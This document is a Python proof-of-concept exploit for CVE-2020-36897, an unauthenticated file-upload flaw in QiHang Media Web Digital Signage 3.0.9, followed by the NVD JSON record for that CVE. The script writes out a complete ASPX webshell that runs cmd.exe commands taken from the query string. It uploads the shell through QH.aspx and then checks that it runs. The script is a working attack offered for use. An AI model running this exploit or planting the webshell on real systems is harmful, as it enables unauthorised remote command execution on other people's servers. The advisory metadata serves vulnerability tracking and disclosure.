CVE-2020-36897

import requests import sys # CVE-2020-36897 PoC - QiHang Media Web Digital Signage Unauthenticated RCE # Target: QiHang Media Web Digital Signage 3.0.9 def exploit(target_url, attacker_ip, attacker_port): """ Exploit for CVE-2020-36897 Uploads malicious ASPX webshell to target server """ # Malicious ASPX webshell content webshell_content = f''' <%@ Page Language="C#" %> <%@ Import Namespace="System.Runtime.InteropServices" %> <script runat="server"> void Page_Load(object sender, EventArgs e) {{ string cmd = Request.QueryString["cmd"]; if (cmd != null) {{ System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + cmd; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.CreateNoWindow = true; p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); }} }} </script> ''' # Construct exploit URL upload_url = f"{target_url}/QH.aspx" # Prepare POST data files = { 'fileToUpload': ('shell.aspx', webshell_content, 'application/x-aspx') } data = { 'remotePath': '/inetpub/wwwroot/' # Target upload path } try: print(f"[*] Exploiting CVE-2020-36897 on {target_url}") print(f"[*] Uploading webshell to {upload_url}") # Send exploit request response = requests.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: shell_url = f"{target_url}/shell.aspx" print(f"[+] Webshell uploaded successfully!") print(f"[+] Shell URL: {shell_url}") print(f"[+] Example command: {shell_url}?cmd=whoami") # Verify shell works verify_url = f"{shell_url}?cmd=echo+CVE-2020-36897" verify_resp = requests.get(verify_url, timeout=10) if 'CVE-2020-36897' in verify_resp.text: print("[+] Webshell verification successful!") return True else: print(f"[-] Exploit failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit(target, "attacker_ip", "4444")

{"cve": {"id": "CVE-2020-36897", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:02.210", "lastModified": "2025-12-17T19:17:14.927", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated remote code execution vulnerability in the QH.aspx file that allows attackers to upload malicious ASPX scripts. Attackers can exploit the file upload functionality by using the 'remotePath' and 'fileToUpload' parameters to write and execute arbitrary system commands on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:howfor:qihang_media_web_digital_signage:3.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "7986DE52-67FF-4879-875B-18D56E480460"}]}]}], "references": [{"url": "http://www.howfor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/48751", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/qihang-media-web-digital-signage-unauthenticated-remote-code-execution", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5582.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5582.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}